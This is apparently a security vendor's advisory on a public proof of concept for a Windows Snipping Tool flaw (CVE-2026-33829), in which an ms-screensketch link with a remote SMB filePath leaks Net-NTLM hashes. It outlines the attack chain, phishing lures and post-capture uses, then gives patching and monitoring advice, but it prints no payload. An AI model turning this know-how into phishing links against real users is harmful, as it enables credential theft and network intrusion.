PoC released for Windows Snipping Tool vulnerability enabling NTLM hash exposure

A proof-of-concept (PoC) exploit has been publicly released for a vulnerability in Microsoft Windows Snipping Tool that can expose users’ Net-NTLM credential hashes. The issue, tracked as CVE-2026-33829, leverages the application’s handling of a registered URI scheme to trigger outbound authentication without the user’s awareness.

The vulnerability has already been patched by Microsoft as part of the April 2026 security updates, but the availability of a working PoC increases the likelihood of real-world exploitation, particularly in phishing scenarios.

How the attack works

The issue originates from the ms-screensketch URI protocol used by Snipping Tool. The application accepts a filePath parameter, which can be manipulated to point to a remote SMB resource controlled by an attacker.

When a victim interacts with a crafted link, the following sequence occurs:

• The malicious link triggers the Snipping Tool via a deep link
• The application attempts to load a remote file over SMB
• Windows automatically initiates authentication
• The attacker captures the Net-NTLM hash during the connection

A typical payload looks like:

No additional execution or malware is required. The authentication attempt alone is enough to expose credentials.

Why this matters

This vulnerability stands out because it blends naturally into normal user behavior and trusted system processes.

• The Snipping Tool opens as expected, creating no suspicion
• The attack requires minimal user interaction
• It relies on built-in Windows authentication mechanisms
• It is highly adaptable to phishing campaigns

Attackers can embed this technique into realistic scenarios such as:

• HR or internal communication requests
• document review prompts
• image editing tasks

In enterprise environments, this makes detection significantly more difficult without visibility into network behavior.

Potential impact

Once captured, NTLM hashes can be used in multiple ways:

• offline password cracking
• NTLM relay attacks against internal services
• lateral movement inside corporate networks
• privilege escalation in poorly segmented environments

Even without immediate compromise, leaked credentials increase long-term exposure risk.

Patch and mitigation

Microsoft addressed the vulnerability on April 14, 2026. Organizations should ensure all systems are updated.

Recommended actions:

• Apply the latest Windows security updates
• Block outbound SMB (TCP port 445) to the internet
• Monitor for unusual outbound SMB connections
• Educate users to avoid interacting with unexpected links
• Review authentication logs for suspicious activity

DIAMATIX perspective

This case highlights a recurring pattern. Attacks increasingly rely on legitimate system behavior, not traditional malware.

The exploitation chain here is simple, but effective:

• trusted application
• expected user interaction
• silent credential exposure

Without continuous monitoring, this activity blends into normal operations.

At DIAMATIX, we see this as a visibility challenge rather than a purely technical vulnerability. Detecting such activity requires:

• correlation of endpoint and network signals
• monitoring authentication flows
• identifying abnormal outbound behavior

Security is no longer only about blocking execution. It is about understanding what “normal” looks like and reacting when it subtly changes.

Sources

• Microsoft Security Updates – April 2026 Patch Tuesday
• Black Arrow Security – vulnerability research and PoC disclosure
• Publicly available technical analysis and security advisories